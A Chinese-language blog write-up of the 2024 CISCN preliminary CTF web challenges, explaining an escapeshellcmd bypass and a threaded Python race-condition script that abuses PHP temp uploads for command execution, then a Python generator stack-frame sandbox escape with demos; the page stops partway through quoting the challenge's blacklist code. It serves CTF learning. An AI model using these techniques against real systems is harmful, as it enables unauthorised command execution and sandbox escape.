<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="John Doe" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      2024-CISCN初赛-Web-复现 
      
      
      |
    
     Hexo
  </title>

  
    <link rel="apple-touch-icon" href="/images/hacker.jpg">
    <link rel="icon" href="/images/hacker.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.0.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/tou.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/"></a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">2024-CISCN初赛-Web-复现</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2024-06-01 00:00:14
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/CTF/" title="CTF">
                    #CTF
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="2024-CISCN初赛-Web-复现"><a href="#2024-CISCN初赛-Web-复现" class="headerlink" title="2024-CISCN初赛-Web-复现"></a>2024-CISCN初赛-Web-复现</h1><h2 id="simple-php"><a href="#simple-php" class="headerlink" title="simple-php"></a>simple-php</h2><h3 id="绕过的打法"><a href="#绕过的打法" class="headerlink" title="绕过的打法"></a>绕过的打法</h3><p>哎比赛的时候还是太懒了，没有去尝试写脚本发包。这里有个坑，我直接在hackbar或者yakit里添加换行符可能会因为奇奇怪怪的编码问题到后端还是解析失败。</p>
<p>赛后复现尝试使用脚本发包成功了，这里主要是一个<code>escapeshellcmd</code>函数，</p>
<p>在LIinux下在碰到如下字符时会添加<code>\</code>，windows下会添加<code>^</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;#;|*?~&lt;&gt;^()[]&#123;&#125;$\  \x0A \xFF</span><br></pre></td></tr></table></figure>

<p>但是我们在Linux下有如下特性</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405311447208.png" alt="image-20240521133132757"></p>
<p>那么也就可以通过这个来进行<code>system($_POST[&#39;cmd&#39;])</code>了，最后flag在数据库中</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405311447851.png" alt="image-20240521133349519"></p>
<p>一些新鲜的linux指令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">du		读磁盘的信息，顺便给了目录信息</span><br><span class="line">paste	paste 命令用于合并文件的列，并显示文件内容</span><br><span class="line">rev		倒序打印文件内容</span><br></pre></td></tr></table></figure>



<h3 id="条件竞争打临时文件"><a href="#条件竞争打临时文件" class="headerlink" title="条件竞争打临时文件"></a>条件竞争打临时文件</h3><p>条件竞争打临时文件，php反弹shell</p>
<p>这是看了<a target="_blank" rel="noopener" href="https://jbnrz.com.cn/%E5%B8%88%E5%82%85%E7%9A%84wp%EF%BC%8C%E6%89%8D%E6%84%8F%E8%AF%86%E5%88%B0%E6%9C%89%E8%BF%99%E7%A7%8D%E6%89%93%E6%B3%95%EF%BC%8Ctql">https://jbnrz.com.cn/师傅的wp，才意识到有这种打法，tql</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"> </span><br><span class="line">url = <span class="string">&quot;url&quot;</span></span><br><span class="line"> </span><br><span class="line">proxies = &#123;<span class="string">&quot;http&quot;</span>: <span class="literal">None</span>&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upoadFile</span>():</span><br><span class="line">    file = &#123;<span class="string">&quot;files&quot;</span>: <span class="built_in">open</span>(<span class="string">&quot;e.php&quot;</span>)&#125;</span><br><span class="line">    data = &#123;<span class="string">&quot;cmd&quot;</span>: <span class="string">&quot;du -a /&quot;</span>&#125;</span><br><span class="line">    res = requests.post(url, files=file, data=data)</span><br><span class="line">    r = re.findall(<span class="string">&quot;(/tmp/php.*)&quot;</span>, res.text)</span><br><span class="line">    <span class="comment"># print(r)</span></span><br><span class="line">    <span class="keyword">if</span> r <span class="keyword">and</span> r[<span class="number">0</span>] != <span class="string">&#x27;&#x27;</span> <span class="keyword">and</span> r[<span class="number">0</span>] != <span class="string">&#x27;/tmp/php&#x27;</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;php &quot;</span> + r[<span class="number">0</span>])</span><br><span class="line">        <span class="built_in">exec</span>(<span class="string">&quot;php &quot;</span> + r[<span class="number">0</span>])</span><br><span class="line">    <span class="comment"># print(res.text)</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getPhp</span>():</span><br><span class="line">    </span><br><span class="line">    data = &#123;<span class="string">&quot;cmd&quot;</span>: <span class="string">&quot;du -lh --max-depth=1 -a /tmp&quot;</span>&#125;</span><br><span class="line">    res = requests.post(url, data=data)</span><br><span class="line">    r = re.findall(<span class="string">&quot;(/tmp/php.*)&quot;</span>, res.text)</span><br><span class="line">    <span class="comment"># print(r)</span></span><br><span class="line">    <span class="keyword">if</span> r <span class="keyword">and</span> r[<span class="number">0</span>] != <span class="string">&#x27;&#x27;</span> <span class="keyword">and</span> r[<span class="number">0</span>] != <span class="string">&#x27;/tmp/php&#x27;</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;php &quot;</span> + r[<span class="number">0</span>])</span><br><span class="line">        <span class="built_in">exec</span>(<span class="string">&quot;php &quot;</span> + r[<span class="number">0</span>])</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exec</span>(<span class="params">cmd</span>):</span><br><span class="line">    data = &#123;<span class="string">&quot;cmd&quot;</span>: cmd&#125;</span><br><span class="line">    res = requests.post(url, data=data)</span><br><span class="line">    <span class="built_in">print</span>(res.text)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">        threading.Thread(target=getPhp).start()</span><br><span class="line">        threading.Thread(target=upoadFile).start()</span><br></pre></td></tr></table></figure>





<h2 id="mossfern"><a href="#mossfern" class="headerlink" title="mossfern"></a>mossfern</h2><p>考点就是利用生成器栈帧进行逃逸</p>
<p>主要参考：</p>
<ol>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12647?time__1311=mqmhDvqIrrGNDQtiQGkIDkW5D=eQ9G4mD&alichlgref=https://www.google.com/#toc-44">https://xz.aliyun.com/t/12647?time__1311=mqmhDvqIrrGNDQtiQGkIDkW5D%3DeQ9G4mD&amp;alichlgref=https%3A%2F%2Fwww.google.com%2F#toc-44</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/13635?time__1311=mqmxnQ0QiQi=DteDsD7md0=dG=dSMOkdxWD&alichlgref=https://www.bing.com/">https://xz.aliyun.com/t/13635?time__1311=mqmxnQ0QiQi%3DDteDsD7md0%3DdG%3DdSMOkdxWD&amp;alichlgref=https%3A%2F%2Fwww.bing.com%2F</a></li>
</ol>
<h3 id="生成器"><a href="#生成器" class="headerlink" title="生成器"></a>生成器</h3><blockquote>
<p>Python生成器：Python中的一种特殊的迭代器，它可以通过简单的函数和表达式进行创建。</p>
<p>特点：可以逐个产生值，并且在每次生成值后保留当前状态，以便下一次调用继续生成值</p>
<p><code>python</code>中生成器使用<code>yield</code>关键字来定义，<code>yield</code>用来产生一个值，并在保留当前状态的同时暂停函数的执行</p>
<p>当下一次调用生成器时，函数会从上次暂停的位置继续执行，直到遇到下一个<code>yield</code>语句或函数结束</p>
</blockquote>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405311946709.png" alt="image-20240531151741212"></p>
<ul>
<li>生成器表达式</li>
</ul>
<blockquote>
<p>创建生成器的紧凑形式，类似于列表推导式（但不是）</p>
<p>注意使用是圆括号而不是方括号 </p>
</blockquote>
<p>​	我们可以使用<code>in</code>关键字去访问一个生成器</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">a=(i+<span class="number">1</span> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>))</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    <span class="built_in">print</span>(i)</span><br></pre></td></tr></table></figure>

<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405311946529.png" alt="image-20240531152117720"></p>
<ul>
<li>生成器的属性</li>
</ul>
<p><code>gi_code</code>：生成器对应的<code>code</code>对象</p>
<p><code>gi_frame</code>：生成器对应的<code>frame</code>对象</p>
<p><code>gi_running</code>：生成器函数是否在执行，生成器函数在<code>yield</code>以后，执行<code>yield</code>的下一行代码前处于<code>frozen</code>状态，此时该字段为0</p>
<p><code>gi_yieldrom</code>：如果生成器正在从另一个生成器中<code>yield</code>值，则在该生成器对象的引用，否则为None</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">f</span>():</span><br><span class="line">    a = <span class="number">1</span></span><br><span class="line">    b = <span class="number">2</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">yield</span> a</span><br><span class="line">        <span class="keyword">yield</span> b</span><br><span class="line">        a += <span class="number">1</span></span><br><span class="line">        b += <span class="number">2</span></span><br><span class="line">f = f()</span><br><span class="line">frame = f.gi_frame</span><br><span class="line"><span class="built_in">next</span>(f)</span><br><span class="line"><span class="built_in">print</span>(frame.f_code)</span><br><span class="line"><span class="built_in">print</span>(frame.f_lasti)</span><br><span class="line"><span class="built_in">print</span>(frame.f_builtins)</span><br><span class="line"><span class="built_in">next</span>(f)</span><br><span class="line"><span class="built_in">next</span>(f)</span><br></pre></td></tr></table></figure>



<p><code>gi_frame</code> 是一个与生成器（generator）和协程（coroutine）相关的属性，帧对象表示代码执行的当前上下文，包含了局部变量、执行的字节码指令等信息。</p>
<p>其拥有的字段如下：</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405311946252.png" alt="image-20240531155249936"></p>
<p>在 Python 中，栈帧（stack frame），也称为帧（frame），是用于执行代码的数据结构。<strong>每当 Python 解释器执行一个函数或方法时，都会创建一个新的栈帧，用于存储该函数或方法的局部变量、参数、返回地址以及其他执行相关的信息。这些栈帧会按照调用顺序被组织成一个栈，称为调用栈</strong>。</p>
<p>栈帧包含了以下几个重要的属性：<br><code>f_locals</code>: 一个字典，包含了函数或方法的局部变量。键是变量名，值是变量的值。<br><code>f_globals</code>: 一个字典，包含了函数或方法所在模块的全局变量。键是全局变量名，值是变量的值。<br><code>f_code</code>: 一个代码对象（code object），包含了函数或方法的字节码指令、常量、变量名等信息。<br><code>f_lasti</code>: 整数，表示最后执行的字节码指令的索引。<br><code>f_back</code>: 指向上一级调用栈帧的引用，用于构建调用栈</p>
<h3 id="使用栈帧实现沙箱逃逸"><a href="#使用栈帧实现沙箱逃逸" class="headerlink" title="使用栈帧实现沙箱逃逸"></a>使用栈帧实现沙箱逃逸</h3><h4 id="一个小插曲"><a href="#一个小插曲" class="headerlink" title="一个小插曲"></a>一个小插曲</h4><p>一个简单的demo</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pdb</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">f</span>():</span><br><span class="line">    <span class="comment"># yield 1</span></span><br><span class="line">    <span class="keyword">yield</span> g.gi_frame.f_back</span><br><span class="line"></span><br><span class="line">g = f()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;------------------start------------------&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(g)</span><br><span class="line">frame = <span class="built_in">next</span>(g)</span><br><span class="line"></span><br><span class="line"><span class="comment"># pdb.set_trace()</span></span><br><span class="line"><span class="built_in">print</span>(frame)</span><br><span class="line"><span class="built_in">print</span>(frame.f_back)</span><br><span class="line"><span class="built_in">print</span>(frame.f_back.f_back)</span><br><span class="line"><span class="built_in">print</span>(frame.f_back.f_back.f_back)</span><br><span class="line"><span class="built_in">print</span>(frame.f_back.f_back.f_back.f_back)</span><br><span class="line"><span class="built_in">print</span>(frame.f_back.f_back.f_back.f_back.f_back)</span><br><span class="line"><span class="built_in">print</span>(frame.f_back.f_back.f_back.f_back.f_back.f_back)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;------------------end------------------&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>直接运行：</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405312043207.png" alt="image-20240531204124941"></p>
<p>但是，这段代码使用IDE调试是不会报错的，因为它使用的是pydev调试器启动文件，相当于调用栈中先执行pydev内部程序，在执行exp.py，所以在<code>f_back</code>回退栈帧时是有得回退的</p>
<p>(参考：<a target="_blank" rel="noopener" href="https://pypi.org/project/pydevd/">https://pypi.org/project/pydevd/</a>)</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405312043417.png" alt="image-20240531204153741"></p>
<p>所以最为保险的方案是使用<code>PDB</code>，用起来很像<code>GDB</code></p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405312045074.png" alt="image-20240531204531450"></p>
<h4 id="逃逸demo"><a href="#逃逸demo" class="headerlink" title="逃逸demo"></a>逃逸demo</h4><p><strong>最核心的点是：你在jail中构造的栈帧能够嵌入到整个程序的调用栈中，这样<code>f_back</code>回滚栈帧的时候才能回到主程序中</strong></p>
<p>总之就是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">compile</span>(<span class="params">source: <span class="built_in">str</span> | <span class="built_in">bytes</span> | mod | AST,</span></span><br><span class="line"><span class="params">            filename: <span class="built_in">str</span> | <span class="built_in">bytes</span> | _PathLike,</span></span><br><span class="line"><span class="params">            mode: <span class="built_in">str</span>,</span></span><br><span class="line"><span class="params">            flags: <span class="built_in">int</span> = ...,</span></span><br><span class="line"><span class="params">            dont_inherit: <span class="built_in">int</span> = ...,</span></span><br><span class="line"><span class="params">            optimize: <span class="built_in">int</span> = ...</span>) -&gt; <span class="type">Any</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">demo.py: compile</span><br><span class="line">	--&gt; filename: &lt;module&gt;</span><br><span class="line">		--&gt; ...</span><br></pre></td></tr></table></figure>



<ul>
<li>demo1</li>
</ul>
<p>调用栈</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">exp.py: <span class="built_in">compile</span>			&lt;= frame.f_back</span><br><span class="line">	--&gt; test: &lt;module&gt; 		&lt;= (frame=g.gi_frame.f_back)</span><br><span class="line">    	--&gt; test: f()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">key = <span class="string">&quot;flag&#123;test&#125;&quot;</span></span><br><span class="line"></span><br><span class="line">codes = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">import pdb</span></span><br><span class="line"><span class="string">def f():</span></span><br><span class="line"><span class="string">    yield g.gi_frame.f_back</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">g = f()		</span></span><br><span class="line"><span class="string">print(g)			# generator</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">frame = next(g)</span></span><br><span class="line"><span class="string"># pdb.set_trace()</span></span><br><span class="line"><span class="string">print(frame)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(frame.f_back)		# jail!</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(frame.f_back.f_back)		# None</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(frame.f_back.f_globals[&#x27;key&#x27;])			</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="built_in">locals</span> = &#123;&#125;</span><br><span class="line">code = <span class="built_in">compile</span>(codes,<span class="string">&quot;test2&quot;</span>,<span class="string">&quot;exec&quot;</span>)</span><br><span class="line"><span class="built_in">exec</span>(code, <span class="built_in">locals</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">locals</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405312055750.png" alt="image-20240531205506279"></p>
<ul>
<li>demo2</li>
</ul>
<p>调用栈如下：</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405312155907.png" alt="image-20240531210144713"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">exp.py: <span class="built_in">compile</span>			&lt;= frame.f_back.f_back</span><br><span class="line">	--&gt; test: &lt;module&gt; 		&lt;= frame.f_back</span><br><span class="line">        --&gt; test: waff()		&lt;= (frame=g.gi_frame.f_back)</span><br><span class="line">            --&gt; test: f()			----------↑</span><br></pre></td></tr></table></figure>



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">s3cret=<span class="string">&quot;this is flag&quot;</span></span><br><span class="line"></span><br><span class="line">codes=<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">def waff():</span></span><br><span class="line"><span class="string">    def f():</span></span><br><span class="line"><span class="string">        yield g.gi_frame.f_back</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    g = f()  #生成器</span></span><br><span class="line"><span class="string">    frame = next(g) #获取到生成器的栈帧对象</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    print(frame)</span></span><br><span class="line"><span class="string">    print(frame.f_back)</span></span><br><span class="line"><span class="string">    print(frame.f_back.f_back)</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    b = frame.f_back.f_back.f_globals[&#x27;s3cret&#x27;] #返回并获取前一级栈帧的globals</span></span><br><span class="line"><span class="string">    return b</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">b=waff()</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="built_in">locals</span>=&#123;&#125;</span><br><span class="line">code = <span class="built_in">compile</span>(codes, <span class="string">&quot;test&quot;</span>, <span class="string">&quot;exec&quot;</span>)</span><br><span class="line"><span class="built_in">exec</span>(code,<span class="built_in">locals</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">locals</span>[<span class="string">&quot;b&quot;</span>])</span><br></pre></td></tr></table></figure>





<ul>
<li>demo3</li>
</ul>
<p>​	这样子不行，因为没有把构造的栈帧挂钩到调用栈中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">s3cret=<span class="string">&quot;this is flag&quot;</span></span><br><span class="line">codes=<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">def f2():</span></span><br><span class="line"><span class="string">    yield 2</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">g = f2()</span></span><br><span class="line"><span class="string">next(g)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(g.gi_frame)               # &lt;frame at 0x000001C35FEE18C0, file &#x27;test&#x27;, line 6, code f2&gt;</span></span><br><span class="line"><span class="string">print(g.gi_frame.f_back)        # None</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="built_in">locals</span> = &#123;&#125;</span><br><span class="line">code = <span class="built_in">compile</span>(codes, <span class="string">&quot;test&quot;</span>, <span class="string">&quot;exec&quot;</span>)</span><br><span class="line"><span class="built_in">exec</span>(code, <span class="built_in">locals</span>)</span><br></pre></td></tr></table></figure>



<h4 id="builtins-字段"><a href="#builtins-字段" class="headerlink" title="__builtins__字段"></a><code>__builtins__</code>字段</h4><p><code>__builtins__</code> 模块是 <strong>Python 解释器启动时自动加载的</strong>，其中包含了一系列内置函数、异常和其他内置对象。</p>
<h3 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h3><p>过滤得挺天花乱坠的，过滤流程：</p>
<ul>
<li>源码上进行正则匹配，上黑名单</li>
<li></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">source_simple_check</span>(<span class="params">source</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Check the source with pure string in string, prevent dangerous strings</span></span><br><span class="line"><span class="string">    :param source: source code</span></span><br><span class="line"><span class="string">    :return: None</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">from</span> sys <span class="keyword">import</span> exit</span><br><span class="line">    <span class="keyword">from</span> builtins <span class="keyword">import</span> <span class="built_in">print</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        source.encode(<span class="string">&quot;ascii&quot;</span>)</span><br><span class="line">    <span class="keyword">except</span> UnicodeEncodeError:</span><br><span 